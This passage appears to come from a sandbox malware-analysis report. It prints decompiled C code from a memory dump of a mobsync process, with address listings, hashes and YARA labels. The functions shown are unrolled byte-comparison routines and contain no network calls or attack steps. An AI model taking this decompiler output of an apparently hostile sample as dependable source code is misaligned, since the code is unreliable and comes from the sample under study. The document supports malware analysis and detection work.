												_t299 = ( *(_t336 - 2) & 0x000000ff) - ( *(_t294 - 2) & 0x000000ff);
												if(_t299 == 0) {
													L3:
													_t246 = ( *(_t336 - 1) & 0x000000ff) - ( *(_t294 - 1) & 0x000000ff);
													if(_t246 != 0) {
														_t246 = (0 | _t246 > 0x00000000) * 2 - 1;
													}
													goto L1;
												}
												_t246 = (0 | _t299 > 0x00000000) * 2 - 1;
												if(_t246 != 0) {
													goto L1;
												} else {
													goto L3;
												}
											}
											_t246 = (0 | _t297 > 0x00000000) * 2 - 1;
											if(_t246 != 0) {
												goto L1;
											}
											goto L83;
										}
										_t301 = (_t203 & 0x000000ff) - ( *(_t294 - 7) & 0x000000ff);
										if(_t301 == 0) {
											L73:
											_t303 = ( *(_t336 - 6) & 0x000000ff) - ( *(_t294 - 6) & 0x000000ff);
											if(_t303 == 0) {
												L75:
												_t305 = ( *(_t336 - 5) & 0x000000ff) - ( *(_t294 - 5) & 0x000000ff);
												if(_t305 == 0) {
													L77:
													_t246 = ( *(_t336 - 4) & 0x000000ff) - ( *(_t294 - 4) & 0x000000ff);
													if(_t246 != 0) {
														_t246 = (0 | _t246 > 0x00000000) * 2 - 1;
													}
													goto L80;
												}
												_t246 = (0 | _t305 > 0x00000000) * 2 - 1;
												if(_t246 != 0) {
													goto L1;
												}
												goto L77;
											}
											_t246 = (0 | _t303 > 0x00000000) * 2 - 1;
											if(_t246 != 0) {
												goto L1;
											}
											goto L75;
										}
										_t246 = (0 | _t301 > 0x00000000) * 2 - 1;
										if(_t246 != 0) {
											goto L1;
										}
										goto L73;
									}
									_t307 = (_t202 & 0x000000ff) - ( *(_t294 - 0xb) & 0x000000ff);
									if(_t307 == 0) {
										L62:
										_t309 = ( *(_t336 - 0xa) & 0x000000ff) - ( *(_t294 - 0xa) & 0x000000ff);
										if(_t309 == 0) {
											L64:
											_t311 = ( *(_t336 - 9) & 0x000000ff) - ( *(_t294 - 9) & 0x000000ff);
											if(_t311 == 0) {
												L66:
												_t246 = ( *(_t336 - 8) & 0x000000ff) - ( *(_t294 - 8) & 0x000000ff);
												if(_t246 != 0) {
													_t246 = (0 | _t246 > 0x00000000) * 2 - 1;
												}
												goto L69;
											}
											_t246 = (0 | _t311 > 0x00000000) * 2 - 1;
											if(_t246 != 0) {
												goto L1;
											}
											goto L66;
										}
										_t246 = (0 | _t309 > 0x00000000) * 2 - 1;
										if(_t246 != 0) {
											goto L1;
										}
										goto L64;
									}
									_t246 = (0 | _t307 > 0x00000000) * 2 - 1;
									if(_t246 != 0) {
										goto L1;
									}
									goto L62;
								}
								_t313 = ( *(_t336 - 0xf) & 0x000000ff) - ( *(_t294 - 0xf) & 0x000000ff);
								if(_t313 == 0) {
									L51:
									_t315 = ( *(_t336 - 0xe) & 0x000000ff) - ( *(_t294 - 0xe) & 0x000000ff);
									if(_t315 == 0) {
										L53:
										_t317 = ( *(_t336 - 0xd) & 0x000000ff) - ( *(_t294 - 0xd) & 0x000000ff);
										if(_t317 == 0) {
											L55:
											_t246 = ( *(_t336 - 0xc) & 0x000000ff) - ( *(_t294 - 0xc) & 0x000000ff);
											if(_t246 != 0) {
												_t246 = (0 | _t246 > 0x00000000) * 2 - 1;
											}
											goto L58;
										}
										_t246 = (0 | _t317 > 0x00000000) * 2 - 1;
										if(_t246 != 0) {
											goto L1;
										}
										goto L55;
									}
									_t246 = (0 | _t315 > 0x00000000) * 2 - 1;
									if(_t246 != 0) {
										goto L1;
									}
									goto L53;
								}
								_t246 = (0 | _t313 > 0x00000000) * 2 - 1;
								if(_t246 != 0) {
									goto L1;
								}
								goto L51;
							}
							_t319 = (_t200 & 0x000000ff) - ( *(_t294 - 0x13) & 0x000000ff);
							if(_t319 == 0) {
								L40:
								_t321 = ( *(_t336 - 0x12) & 0x000000ff) - ( *(_t294 - 0x12) & 0x000000ff);
								if(_t321 == 0) {
									L42:
									_t323 = ( *(_t336 - 0x11) & 0x000000ff) - ( *(_t294 - 0x11) & 0x000000ff);
									if(_t323 == 0) {
										L44:
										_t246 = ( *(_t336 - 0x10) & 0x000000ff) - ( *(_t294 - 0x10) & 0x000000ff);
										if(_t246 != 0) {
											_t246 = (0 | _t246 > 0x00000000) * 2 - 1;
										}
										goto L47;
									}
									_t246 = (0 | _t323 > 0x00000000) * 2 - 1;
									if(_t246 != 0) {
										goto L1;
									}
									goto L44;
								}
								_t246 = (0 | _t321 > 0x00000000) * 2 - 1;
								if(_t246 != 0) {
									goto L1;
								}
								goto L42;
							}
							_t246 = (0 | _t319 > 0x00000000) * 2 - 1;
							if(_t246 != 0) {
								goto L1;
							}
							goto L40;
						}
						_t325 = (_t199 & 0x000000ff) - ( *(_t294 - 0x17) & 0x000000ff);
						if(_t325 == 0) {
							L29:
							_t327 = ( *(_t336 - 0x16) & 0x000000ff) - ( *(_t294 - 0x16) & 0x000000ff);
							if(_t327 == 0) {
								L31:
								_t329 = ( *(_t336 - 0x15) & 0x000000ff) - ( *(_t294 - 0x15) & 0x000000ff);
								if(_t329 == 0) {
									L33:
									_t246 = ( *(_t336 - 0x14) & 0x000000ff) - ( *(_t294 - 0x14) & 0x000000ff);
									if(_t246 != 0) {
										_t246 = (0 | _t246 > 0x00000000) * 2 - 1;
									}
									goto L36;
								}
								_t246 = (0 | _t329 > 0x00000000) * 2 - 1;
								if(_t246 != 0) {
									goto L1;
								}
								goto L33;
							}
							_t246 = (0 | _t327 > 0x00000000) * 2 - 1;
							if(_t246 != 0) {
								goto L1;
							}
							goto L31;
						}
						_t246 = (0 | _t325 > 0x00000000) * 2 - 1;
						if(_t246 != 0) {
							goto L1;
						}
						goto L29;
					}
					_t331 = (_t198 & 0x000000ff) - ( *(_t294 - 0x1b) & 0x000000ff);
					if(_t331 == 0) {
						L18:
						_t333 = ( *(_t336 - 0x1a) & 0x000000ff) - ( *(_t294 - 0x1a) & 0x000000ff);
						if(_t333 == 0) {
							L20:
							_t335 = ( *(_t336 - 0x19) & 0x000000ff) - ( *(_t294 - 0x19) & 0x000000ff);
							if(_t335 == 0) {
								L22:
								_t246 = ( *(_t336 - 0x18) & 0x000000ff) - ( *(_t294 - 0x18) & 0x000000ff);
								if(_t246 != 0) {
									_t246 = (0 | _t246 > 0x00000000) * 2 - 1;
								}
								goto L25;
							}
							_t246 = (0 | _t335 > 0x00000000) * 2 - 1;
							if(_t246 != 0) {
								goto L1;
							}
							goto L22;
						}
						_t246 = (0 | _t333 > 0x00000000) * 2 - 1;
						if(_t246 != 0) {
							goto L1;
						}
						goto L20;
					}
					_t246 = (0 | _t331 > 0x00000000) * 2 - 1;
					if(_t246 != 0) {
						goto L1;
					}
					goto L18;
				} else {
					__edi =  *(__esi - 0x1f) & 0x000000ff;
					__edi = ( *(__esi - 0x1f) & 0x000000ff) - ( *(__edx - 0x1f) & 0x000000ff);
					if(__edi == 0) {
						L7:
						__edi =  *(__esi - 0x1e) & 0x000000ff;
						__edi = ( *(__esi - 0x1e) & 0x000000ff) - ( *(__edx - 0x1e) & 0x000000ff);
						if(__edi == 0) {
							L9:
							__edi =  *(__esi - 0x1d) & 0x000000ff;
							__edi = ( *(__esi - 0x1d) & 0x000000ff) - ( *(__edx - 0x1d) & 0x000000ff);
							if(__edi == 0) {
								L11:
								__ecx =  *(__esi - 0x1c) & 0x000000ff;
								__ecx = ( *(__esi - 0x1c) & 0x000000ff) - ( *(__edx - 0x1c) & 0x000000ff);
								if(__ecx != 0) {
									__ecx = (0 | __ecx > 0x00000000) * 2 - 1;
								}
								goto L14;
							}
							0 = 0 | __edi > 0x00000000;
							__ecx = (__edi > 0) * 2 != 1;
							if((__edi > 0) * 2 != 1) {
								goto L1;
							}
							goto L11;
						}
						0 = 0 | __edi > 0x00000000;
						__ecx = (__edi > 0) * 2 != 1;
						if((__edi > 0) * 2 != 1) {
							goto L1;
						}
						goto L9;
					}
					0 = 0 | __edi > 0x00000000;
					__ecx = (__edi > 0) * 2 != 1;
					if((__edi > 0) * 2 != 1) {
						goto L1;
					}
					goto L7;
				}
				L1:
				_t197 = _t246;
				return _t197;
			}

0x0043424f
0x0043424f
0x00434255
0x004342dd
0x004342df
0x004342e1
0x00000000
0x00000000
0x004342e7
0x004342ed
0x00434374
0x00434376
0x00434378
0x00000000
0x00000000
0x0043437e
0x00434384
0x0043440b
0x0043440d
0x0043440f
0x00000000
0x00000000
0x00434415
0x0043441b
0x004344a2
0x004344a4
0x004344a6
0x00000000
0x00000000
0x004344b2
0x0043453a
0x0043453c
0x0043453e
0x00000000
0x00000000
0x00434544
0x0043454a
0x004345d1
0x004345d3
0x004345d5
0x00000000
0x00000000
0x004345db
0x004345e1
0x00434668
0x0043466a
0x0043466c
0x00000000
0x00000000
0x0043467a
0x0043467c
0x00434694
0x0043469c
0x0043469e
0x00433df7
0x00433dff
0x00433e01
0x00433e0e
0x00433e0e
0x00000000
0x00433e01
0x004346ab
0x00433df1
0x00000000
0x00000000
0x00000000
0x00000000
0x00433df1
0x00434685
0x0043468e
0x00000000
0x00000000
0x00000000
0x0043468e
0x004345ee
0x004345f0
0x00434608
0x00434610
0x00434612
0x0043462a
0x00434632
0x00434634
0x0043464c
0x00434654
0x00434656
0x0043465f
0x0043465f
0x00000000
0x00434656
0x0043463d
0x00434646
0x00000000
0x00000000
0x00000000
0x00434646
0x0043461b
0x00434624
0x00000000
0x00000000
0x00000000
0x00434624
0x004345f9
0x00434602
0x00000000
0x00000000
0x00000000
0x00434602
0x00434557
0x00434559
0x00434571
0x00434579
0x0043457b
0x00434593
0x0043459b
0x0043459d
0x004345b5
0x004345bd
0x004345bf
0x004345c8
0x004345c8
0x00000000
0x004345bf
0x004345a6
0x004345af
0x00000000
0x00000000
0x00000000
0x004345af
0x00434584
0x0043458d
0x00000000
0x00000000
0x00000000
0x0043458d
0x00434562
0x0043456b
0x00000000
0x00000000
0x00000000
0x0043456b
0x004344c0
0x004344c2
0x004344da
0x004344e2
0x004344e4
0x004344fc
0x00434504
0x00434506
0x0043451e
0x00434526
0x00434528
0x00434531
0x00434531
0x00000000
0x00434528
0x0043450f
0x00434518
0x00000000
0x00000000
0x00000000
0x00434518
0x004344ed
0x004344f6
0x00000000
0x00000000
0x00000000
0x004344f6
0x004344cb
0x004344d4
0x00000000
0x00000000
0x00000000
0x004344d4
0x00434428
0x0043442a
0x00434442
0x0043444a
0x0043444c
0x00434464
0x0043446c
0x0043446e
0x00434486
0x0043448e
0x00434490
0x00434499
0x00434499
0x00000000
0x00434490
0x00434477
0x00434480
0x00000000
0x00000000
0x00000000
0x00434480
0x00434455
0x0043445e
0x00000000
0x00000000
0x00000000
0x0043445e
0x00434433
0x0043443c
0x00000000
0x00000000
0x00000000
0x0043443c
0x00434391
0x00434393
0x004343ab
0x004343b3
0x004343b5
0x004343cd
0x004343d5
0x004343d7
0x004343ef
0x004343f7
0x004343f9
0x00434402
0x00434402
0x00000000
0x004343f9
0x004343e0
0x004343e9
0x00000000
0x00000000
0x00000000
0x004343e9
0x004343be
0x004343c7
0x00000000
0x00000000
0x00000000
0x004343c7
0x0043439c
0x004343a5
0x00000000
0x00000000
0x00000000
0x004343a5
0x004342fa
0x004342fc
0x00434314
0x0043431c
0x0043431e
0x00434336
0x0043433e
0x00434340
0x00434358
0x00434360
0x00434362
0x0043436b
0x0043436b
0x00000000
0x00434362
0x00434349
0x00434352
0x00000000
0x00000000
0x00000000
0x00434352
0x00434327
0x00434330
0x00000000
0x00000000
0x00000000
0x00434330
0x00434305
0x0043430e
0x00000000
0x00000000
0x00000000
0x0043425b
0x0043425f
0x00434263
0x00434265
0x0043427d
0x0043427d
0x00434285
0x00434287
0x0043429f
0x0043429f
0x004342a7
0x004342a9
0x004342c1
0x004342c1
0x004342c9
0x004342cb
0x004342d4
0x004342d4
0x00000000
0x004342cb
0x004342af
0x004342b2
0x004342bb
0x00000000
0x00000000
0x00000000
0x004342bb
0x0043428d
0x00434290
0x00434299
0x00000000
0x00000000
0x00000000
0x00434299
0x0043426b
0x0043426e
0x00434277
0x00000000
0x00000000
0x00000000
0x00434277
0x004339dd
0x004339dd
0x004347ce

Memory Dump Source

Source File: 00000008.00000002.491601903.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Associated: 00000008.00000002.492378547.000000000046F000.00000040.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_400000_mobsync.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a635e2a33a60bcf8d734eac2a911e111534612f0cd64c6a362f1e57f4f360174
Instruction ID: 408e5dc9d1f9a891ea97fd5a4050b58cd4f2d4fd4c8bb63a7fc0ce09d4585151
Opcode Fuzzy Hash: a635e2a33a60bcf8d734eac2a911e111534612f0cd64c6a362f1e57f4f360174
Instruction Fuzzy Hash: 84C1E9722050934ADF2D4A39C43517FBAA15EE67B271A236FD4F2CB2C4EE18E624D614

Uniqueness

Uniqueness Score: -1.00%

Function 004339E5, Relevance: .3, Instructions: 331
COMMONCrypto

Download Yara Rule

C-Code - Quality: 100%

			E004339E5(void* __edx, void* __esi) {
				signed int _t184;
				signed char _t185;
				signed char _t186;
				signed char _t187;
				signed char _t188;
				signed char _t190;
				signed int _t231;
				void* _t275;
				void* _t278;
				void* _t280;
				void* _t282;
				void* _t284;
				void* _t286;
				void* _t288;
				void* _t290;
				void* _t292;
				void* _t294;
				void* _t296;
				void* _t298;
				void* _t300;
				void* _t302;
				void* _t304;
				void* _t306;
				void* _t308;
				void* _t310;
				void* _t312;
				void* _t313;

				_t313 = __esi;
				_t275 = __edx;
				if( *((intOrPtr*)(__esi - 0x1d)) ==  *((intOrPtr*)(__edx - 0x1d))) {
					_t231 = 0;
					L11:
					if(_t231 != 0) {
						goto L1;
					}
					_t185 =  *(_t313 - 0x19);
					if(_t185 ==  *(_t275 - 0x19)) {
						_t231 = 0;
						L22:
						if(_t231 != 0) {
							goto L1;
						}
						_t186 =  *(_t313 - 0x15);
						if(_t186 ==  *(_t275 - 0x15)) {
							_t231 = 0;
							L33:
							if(_t231 != 0) {
								goto L1;
							}
							_t187 =  *(_t313 - 0x11);
							if(_t187 ==  *(_t275 - 0x11)) {
								_t231 = 0;
								L44:
								if(_t231 != 0) {
									goto L1;
								}
								_t188 =  *(_t313 - 0xd);
								if(_t188 ==  *(_t275 - 0xd)) {
									_t231 = 0;
									L55:
									if(_t231 != 0) {
										goto L1;
									}
									if( *(_t313 - 9) ==  *(_t275 - 9)) {
										_t231 = 0;
										L66:
										if(_t231 != 0) {
											goto L1;
										}
										_t190 =  *(_t313 - 5);
										if(_t190 ==  *(_t275 - 5)) {
											_t231 = 0;
											L77:
											if(_t231 == 0) {
												_t231 = ( *(_t313 - 1) & 0x000000ff) - ( *(_t275 - 1) & 0x000000ff);
												if(_t231 != 0) {
													_t231 = (0 | _t231 > 0x00000000) * 2 - 1;
												}
											}
											goto L1;
										}
										_t278 = (_t190 & 0x000000ff) - ( *(_t275 - 5) & 0x000000ff);
										if(_t278 == 0) {
											L70:
											_t280 = ( *(_t313 - 4) & 0x000000ff) - ( *(_t275 - 4) & 0x000000ff);
											if(_t280 == 0) {
												L72:
												_t282 = ( *(_t313 - 3) & 0x000000ff) - ( *(_t275 - 3) & 0x000000ff);
												if(_t282 == 0) {
													L74:
													_t231 = ( *(_t313 - 2) & 0x000000ff) - ( *(_t275 - 2) & 0x000000ff);
													if(_t231 != 0) {
														_t231 = (0 | _t231 > 0x00000000) * 2 - 1;
													}
													goto L77;
												}
												_t231 = (0 | _t282 > 0x00000000) * 2 - 1;
												if(_t231 != 0) {
													goto L1;
												}
												goto L74;
											}
											_t231 = (0 | _t280 > 0x00000000) * 2 - 1;
											if(_t231 != 0) {
												goto L1;
											}
											goto L72;
										}
										_t231 = (0 | _t278 > 0x00000000) * 2 - 1;
										if(_t231 != 0) {
											goto L1;
										}
										goto L70;
									}
									_t284 = ( *(_t313 - 9) & 0x000000ff) - ( *(_t275 - 9) & 0x000000ff);
									if(_t284 == 0) {
										L59:
										_t286 = ( *(_t313 - 8) & 0x000000ff) - ( *(_t275 - 8) & 0x000000ff);
										if(_t286 == 0) {
											L61:
											_t288 = ( *(_t313 - 7) & 0x000000ff) - ( *(_t275 - 7) & 0x000000ff);
											if(_t288 == 0) {
												L63:
												_t231 = ( *(_t313 - 6) & 0x000000ff) - ( *(_t275 - 6) & 0x000000ff);
												if(_t231 != 0) {
													_t231 = (0 | _t231 > 0x00000000) * 2 - 1;
												}
												goto L66;
											}
											_t231 = (0 | _t288 > 0x00000000) * 2 - 1;
											if(_t231 != 0) {
												goto L1;
											}
											goto L63;
										}
										_t231 = (0 | _t286 > 0x00000000) * 2 - 1;
										if(_t231 != 0) {
											goto L1;
										}
										goto L61;
									}
									_t231 = (0 | _t284 > 0x00000000) * 2 - 1;
									if(_t231 != 0) {
										goto L1;
									}
									goto L59;
								}
								_t290 = (_t188 & 0x000000ff) - ( *(_t275 - 0xd) & 0x000000ff);
								if(_t290 == 0) {
									L48:
									_t292 = ( *(_t313 - 0xc) & 0x000000ff) - ( *(_t275 - 0xc) & 0x000000ff);
									if(_t292 == 0) {
										L50:
										_t294 = ( *(_t313 - 0xb) & 0x000000ff) - ( *(_t275 - 0xb) & 0x000000ff);
										if(_t294 == 0) {
											L52:
											_t231 = ( *(_t313 - 0xa) & 0x000000ff) - ( *(_t275 - 0xa) & 0x000000ff);
											if(_t231 != 0) {
												_t231 = (0 | _t231 > 0x00000000) * 2 - 1;
											}
											goto L55;
										}
										_t231 = (0 | _t294 > 0x00000000) * 2 - 1;
										if(_t231 != 0) {
											goto L1;
										}
										goto L52;
									}
									_t231 = (0 | _t292 > 0x00000000) * 2 - 1;
									if(_t231 != 0) {
										goto L1;
									}
									goto L50;
								}
								_t231 = (0 | _t290 > 0x00000000) * 2 - 1;
								if(_t231 != 0) {
									goto L1;
								}
								goto L48;
							}
							_t296 = (_t187 & 0x000000ff) - ( *(_t275 - 0x11) & 0x000000ff);
							if(_t296 == 0) {
								L37:
								_t298 = ( *(_t313 - 0x10) & 0x000000ff) - ( *(_t275 - 0x10) & 0x000000ff);
								if(_t298 == 0) {
									L39:
									_t300 = ( *(_t313 - 0xf) & 0x000000ff) - ( *(_t275 - 0xf) & 0x000000ff);
									if(_t300 == 0) {
										L41:
										_t231 = ( *(_t313 - 0xe) & 0x000000ff) - ( *(_t275 - 0xe) & 0x000000ff);
										if(_t231 != 0) {
											_t231 = (0 | _t231 > 0x00000000) * 2 - 1;
										}
										goto L44;
									}
									_t231 = (0 | _t300 > 0x00000000) * 2 - 1;
									if(_t231 != 0) {
										goto L1;
									}
									goto L41;
								}
								_t231 = (0 | _t298 > 0x00000000) * 2 - 1;
								if(_t231 != 0) {
									goto L1;
								}
								goto L39;
							}
							_t231 = (0 | _t296 > 0x00000000) * 2 - 1;
							if(_t231 != 0) {
								goto L1;
							}
							goto L37;
						}
						_t302 = (_t186 & 0x000000ff) - ( *(_t275 - 0x15) & 0x000000ff);
						if(_t302 == 0) {
							L26:
							_t304 = ( *(_t313 - 0x14) & 0x000000ff) - ( *(_t275 - 0x14) & 0x000000ff);
							if(_t304 == 0) {
								L28:
								_t306 = ( *(_t313 - 0x13) & 0x000000ff) - ( *(_t275 - 0x13) & 0x000000ff);
								if(_t306 == 0) {
									L30:
									_t231 = ( *(_t313 - 0x12) & 0x000000ff) - ( *(_t275 - 0x12) & 0x000000ff);
									if(_t231 != 0) {
										_t231 = (0 | _t231 > 0x00000000) * 2 - 1;
									}
									goto L33;
								}
								_t231 = (0 | _t306 > 0x00000000) * 2 - 1;
								if(_t231 != 0) {
									goto L1;
								}
								goto L30;
							}
							_t231 = (0 | _t304 > 0x00000000) * 2 - 1;
							if(_t231 != 0) {
								goto L1;
							}
							goto L28;
						}
						_t231 = (0 | _t302 > 0x00000000) * 2 - 1;
						if(_t231 != 0) {
							goto L1;
						}
						goto L26;
					}
					_t308 = (_t185 & 0x000000ff) - ( *(_t275 - 0x19) & 0x000000ff);
					if(_t308 == 0) {
						L15:
						_t310 = ( *(_t313 - 0x18) & 0x000000ff) - ( *(_t275 - 0x18) & 0x000000ff);
						if(_t310 == 0) {
							L17:
							_t312 = ( *(_t313 - 0x17) & 0x000000ff) - ( *(_t275 - 0x17) & 0x000000ff);
							if(_t312 == 0) {
								L19:
								_t231 = ( *(_t313 - 0x16) & 0x000000ff) - ( *(_t275 - 0x16) & 0x000000ff);
								if(_t231 != 0) {
									_t231 = (0 | _t231 > 0x00000000) * 2 - 1;
								}
								goto L22;
							}
							_t231 = (0 | _t312 > 0x00000000) * 2 - 1;
							if(_t231 != 0) {
								goto L1;
							}
							goto L19;
						}
						_t231 = (0 | _t310 > 0x00000000) * 2 - 1;
						if(_t231 != 0) {
							goto L1;
						}
						goto L17;
					}
					_t231 = (0 | _t308 > 0x00000000) * 2 - 1;
					if(_t231 != 0) {
						goto L1;
					}
					goto L15;
				} else {
					__edi = __al & 0x000000ff;
					__edi = (__al & 0x000000ff) - ( *(__edx - 0x1d) & 0x000000ff);
					if(__edi == 0) {
						L4:
						__edi =  *(__esi - 0x1c) & 0x000000ff;
						__edi = ( *(__esi - 0x1c) & 0x000000ff) - ( *(__edx - 0x1c) & 0x000000ff);
						if(__edi == 0) {
							L6:
							__edi =  *(__esi - 0x1b) & 0x000000ff;
							__edi = ( *(__esi - 0x1b) & 0x000000ff) - ( *(__edx - 0x1b) & 0x000000ff);
							if(__edi == 0) {
								L8:
								__ecx =  *(__esi - 0x1a) & 0x000000ff;
								__ecx = ( *(__esi - 0x1a) & 0x000000ff) - ( *(__edx - 0x1a) & 0x000000ff);
								if(__ecx != 0) {
									__ecx = (0 | __ecx > 0x00000000) * 2 - 1;
								}
								goto L11;
							}
							0 = 0 | __edi > 0x00000000;
							__ecx = (__edi > 0) * 2 != 1;
							if((__edi > 0) * 2 != 1) {
								goto L1;
							}
							goto L8;
						}
						0 = 0 | __edi > 0x00000000;
						__ecx = (__edi > 0) * 2 != 1;
						if((__edi > 0) * 2 != 1) {
							goto L1;
						}
						goto L6;
					}
					0 = 0 | __edi > 0x00000000;
					__ecx = (__edi > 0) * 2 != 1;
					if((__edi > 0) * 2 != 1) {
						goto L1;
					}
					goto L4;
				}
				L1:
				_t184 = _t231;
				return _t184;
			}

0x004339e5
0x004339e5
0x004339eb
0x00433a62
0x00433a64
0x00433a66
0x00000000
0x00000000
0x00433a6c
0x00433a72
0x00433af9
0x00433afb
0x00433afd
0x00000000
0x00000000
0x00433b03
0x00433b09
0x00433b90
0x00433b92
0x00433b94
0x00000000
0x00000000
0x00433b9a
0x00433ba0
0x00433c27
0x00433c29
0x00433c2b
0x00000000
0x00000000
0x00433c31
0x00433c37
0x00433cbe
0x00433cc0
0x00433cc2
0x00000000
0x00000000
0x00433cce
0x00433d56
0x00433d58
0x00433d5a
0x00000000
0x00000000
0x00433d60
0x00433d66
0x00433ded
0x00433def
0x00433df1
0x00433dff
0x00433e01
0x00433e0e
0x00433e0e
0x00433e01
0x00000000
0x00433df1
0x00433d73
0x00433d75
0x00433d8d
0x00433d95
0x00433d97
0x00433daf
0x00433db7
0x00433db9
0x00433dd1
0x00433dd9
0x00433ddb
0x00433de4
0x00433de4
0x00000000
0x00433ddb
0x00433dc2
0x00433dcb
0x00000000
0x00000000
0x00000000
0x00433dcb
0x00433da0
0x00433da9
0x00000000
0x00000000
0x00000000
0x00433da9
0x00433d7e
0x00433d87
0x00000000
0x00000000
0x00000000
0x00433d87
0x00433cdc
0x00433cde
0x00433cf6
0x00433cfe
0x00433d00
0x00433d18
0x00433d20
0x00433d22
0x00433d3a
0x00433d42
0x00433d44
0x00433d4d
0x00433d4d
0x00000000
0x00433d44
0x00433d2b
0x00433d34
0x00000000
0x00000000
0x00000000
0x00433d34
0x00433d09
0x00433d12
0x00000000
0x00000000
0x00000000
0x00433d12
0x00433ce7
0x00433cf0
0x00000000
0x00000000
0x00000000
0x00433cf0
0x00433c44
0x00433c46
0x00433c5e
0x00433c66
0x00433c68
0x00433c80
0x00433c88
0x00433c8a
0x00433ca2
0x00433caa
0x00433cac
0x00433cb5
0x00433cb5
0x00000000
0x00433cac
0x00433c93
0x00433c9c
0x00000000
0x00000000
0x00000000
0x00433c9c
0x00433c71
0x00433c7a
0x00000000
0x00000000
0x00000000
0x00433c7a
0x00433c4f
0x00433c58
0x00000000
0x00000000
0x00000000
0x00433c58
0x00433bad
0x00433baf
0x00433bc7
0x00433bcf
0x00433bd1
0x00433be9
0x00433bf1
0x00433bf3
0x00433c0b
0x00433c13
0x00433c15
0x00433c1e
0x00433c1e
0x00000000
0x00433c15
0x00433bfc
0x00433c05
0x00000000
0x00000000
0x00000000
0x00433c05
0x00433bda
0x00433be3
0x00000000
0x00000000
0x00000000
0x00433be3
0x00433bb8
0x00433bc1
0x00000000
0x00000000
0x00000000
0x00433bc1
0x00433b16
0x00433b18
0x00433b30
0x00433b38
0x00433b3a
0x00433b52
0x00433b5a
0x00433b5c
0x00433b74
0x00433b7c
0x00433b7e
0x00433b87
0x00433b87
0x00000000
0x00433b7e
0x00433b65
0x00433b6e
0x00000000
0x00000000
0x00000000
0x00433b6e
0x00433b43
0x00433b4c
0x00000000
0x00000000
0x00000000
0x00433b4c
0x00433b21
0x00433b2a
0x00000000
0x00000000
0x00000000
0x00433b2a
0x00433a7f
0x00433a81
0x00433a99
0x00433aa1
0x00433aa3
0x00433abb
0x00433ac3
0x00433ac5
0x00433add
0x00433ae5
0x00433ae7
0x00433af0
0x00433af0
0x00000000
0x00433ae7
0x00433ace
0x00433ad7
0x00000000
0x00000000
0x00000000
0x00433ad7
0x00433aac
0x00433ab5
0x00000000
0x00000000
0x00000000
0x00433ab5
0x00433a8a
0x00433a93
0x00000000
0x00000000
0x00000000
0x004339ed
0x004339ed
0x004339f4
0x004339f6
0x00433a0a
0x00433a0a
0x00433a12
0x00433a14
0x00433a28
0x00433a28
0x00433a30
0x00433a32
0x00433a46
0x00433a46
0x00433a4e
0x00433a50
0x00433a59
0x00433a59
0x00000000
0x00433a50
0x00433a38
0x00433a3b
0x00433a44
0x00000000
0x00000000
0x00000000
0x00433a44
0x00433a1a
0x00433a1d
0x00433a26
0x00000000
0x00000000
0x00000000
0x00433a26
0x004339fc
0x004339ff
0x00433a08
0x00000000
0x00000000
0x00000000
0x00433a08
0x004339dd
0x004339dd
0x004347ce

Memory Dump Source

Source File: 00000008.00000002.491601903.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Associated: 00000008.00000002.492378547.000000000046F000.00000040.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_400000_mobsync.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 693fc2a06020ee0ee57da02a4a933cd5ad315ff3ac21a4b032580d2a5e4f36f6
Instruction ID: 85b8dbf0205f4301feb0929524898f317bf7774950f20f4890cd724f5c343f09
Opcode Fuzzy Hash: 693fc2a06020ee0ee57da02a4a933cd5ad315ff3ac21a4b032580d2a5e4f36f6
Instruction Fuzzy Hash: B1C1B47220509389DF1D4A39843513FFAA15E957B3B1A275FD4F2CB2C5EE18D724C614

Uniqueness

Uniqueness Score: -1.00%

Function 004335CD, Relevance: .3, Instructions: 323
COMMONCrypto

Download Yara Rule

C-Code - Quality: 100%

			E004335CD(void* __edx, void* __esi) {
				signed char _t177;
				void* _t178;
				signed char _t179;
				signed char _t180;
				signed char _t181;
				signed char _t183;
				signed char _t184;
				void* _t228;
				void* _t278;
				void* _t281;
				void* _t283;
				void* _t285;
				void* _t287;
				void* _t289;
				void* _t291;
				void* _t293;
				void* _t295;
				void* _t297;
				void* _t299;
				void* _t301;
				void* _t303;
				void* _t305;
				void* _t307;
				void* _t309;
				void* _t311;
				void* _t313;
				void* _t315;
				void* _t317;
				void* _t319;
				void* _t321;
				void* _t322;

				_t322 = __esi;
				_t278 = __edx;
				_t177 =  *(__esi - 0x1c);
				if(_t177 ==  *(__edx - 0x1c)) {
					_t228 = 0;
					L10:
					if(_t228 != 0) {
						L78:
						_t178 = _t228;
						return _t178;
					}
					_t179 =  *(_t322 - 0x18);
					if(_t179 ==  *(_t278 - 0x18)) {
						_t228 = 0;
						L21:
						if(_t228 != 0) {
							goto L78;
						}
						_t180 =  *(_t322 - 0x14);
						if(_t180 ==  *(_t278 - 0x14)) {
							_t228 = 0;
							L32:
							if(_t228 != 0) {
								goto L78;
							}
							_t181 =  *(_t322 - 0x10);
							if(_t181 ==  *(_t278 - 0x10)) {
								_t228 = 0;
								L43:
								if(_t228 != 0) {
									goto L78;
								}
								if( *(_t322 - 0xc) ==  *(_t278 - 0xc)) {
									_t228 = 0;
									L54:
									if(_t228 != 0) {
										goto L78;
									}
									_t183 =  *(_t322 - 8);
									if(_t183 ==  *(_t278 - 8)) {
										_t228 = 0;
										L65:
										if(_t228 != 0) {
											goto L78;
										}
										_t184 =  *(_t322 - 4);
										if(_t184 ==  *(_t278 - 4)) {
											_t228 = 0;
											L76:
											if(_t228 == 0) {
												_t228 = 0;
											}
											goto L78;
										}
										_t281 = (_t184 & 0x000000ff) - ( *(_t278 - 4) & 0x000000ff);
										if(_t281 == 0) {
											L69:
											_t283 = ( *(_t322 - 3) & 0x000000ff) - ( *(_t278 - 3) & 0x000000ff);
											if(_t283 == 0) {
												L71:
												_t285 = ( *(_t322 - 2) & 0x000000ff) - ( *(_t278 - 2) & 0x000000ff);
												if(_t285 == 0) {
													L73:
													_t228 = ( *(_t322 - 1) & 0x000000ff) - ( *(_t278 - 1) & 0x000000ff);
													if(_t228 != 0) {
														_t228 = (0 | _t228 > 0x00000000) * 2 - 1;
													}
													goto L76;
												}
